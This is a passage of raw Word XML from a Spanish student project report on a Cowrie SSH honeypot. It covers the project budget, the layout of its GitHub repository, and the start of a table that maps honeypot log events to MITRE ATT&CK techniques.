              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Open source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VirtualBox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Open source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Open source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">API ip-api.com (geolocalización)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Free tier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Total estimado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">≈ 15 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Unos 2 meses de servidor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Todo el software empleado es libre o gratuito. El único coste económico es el servidor cloud: 6,64 € al mes por el servidor CX23 y 0,61 € por la dirección IPv4, IVA incluido, facturados por horas. Está previsto mantenerlo unos dos meses (despliegue, captura y análisis) y eliminarlo después, junto con su dirección IP, para que deje de facturarse. El anteproyecto contemplaba un coste nulo al usar el tier gratuito de Oracle Cloud; el cambio de proveedor se explica en el capítulo de Tecnología. A ello se suma el tiempo del alumno, estimado en 109 horas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">README y Git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El código fuente, los scripts de análisis y la documentación del proyecto se gestionan en un repositorio público de GitHub:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">https://github.com/diegofonterosa/PFC-Cowrie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El repositorio incluye un fichero README.md con instrucciones de uso, la estructura de directorios y los comandos necesarios para ejecutar los scripts. Se utiliza Git como sistema de control de versiones, con commits descriptivos que documentan la evolución del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La estructura del repositorio se organiza en directorios temáticos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">docs/: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">anteproyecto y memoria del proyecto en formato editable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">scripts/: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">scripts Python de análisis (cowrie_analyzer.py) y generación de datos de prueba (generate_sample_logs.py).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">config/: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ficheros de configuración (Cowrie, SSH, systemd) y scripts de despliegue: bastionado, instalación de Cowrie y redirección con iptables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">logs/sample/: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">logs de ejemplo para pruebas sin necesidad de datos reales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">capturas/: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">capturas de pantalla organizadas por fase del proyecto (fase1-despliegue hasta fase6-informe).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">graficas/: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">gráficas PNG generadas por el script de análisis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Catálogo de Técnicas MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La clasificación de la actividad se automatiza con el módulo mitre_mapping.py, descrito en el capítulo de Implementación. La tabla siguiente recoge su catálogo de reglas: las técnicas que el clasificador es capaz de reconocer y los indicadores que busca en los logs de Cowrie. Los identificadores se han comprobado contra la web oficial de MITRE ATT&amp;CK.</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349"/>
        <w:gridCol w:w="2699"/>
        <w:gridCol w:w="1270"/>
        <w:gridCol w:w="2620"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Táctica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Técnica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Indicadores en los logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Valid Accounts: Local Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1078.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Evento cowrie.login.success</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Command and Scripting Interpreter: Unix Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1059.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cualquier evento cowrie.command.input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1700"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Account Manipulation: SSH Authorized Keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="800"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1098.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
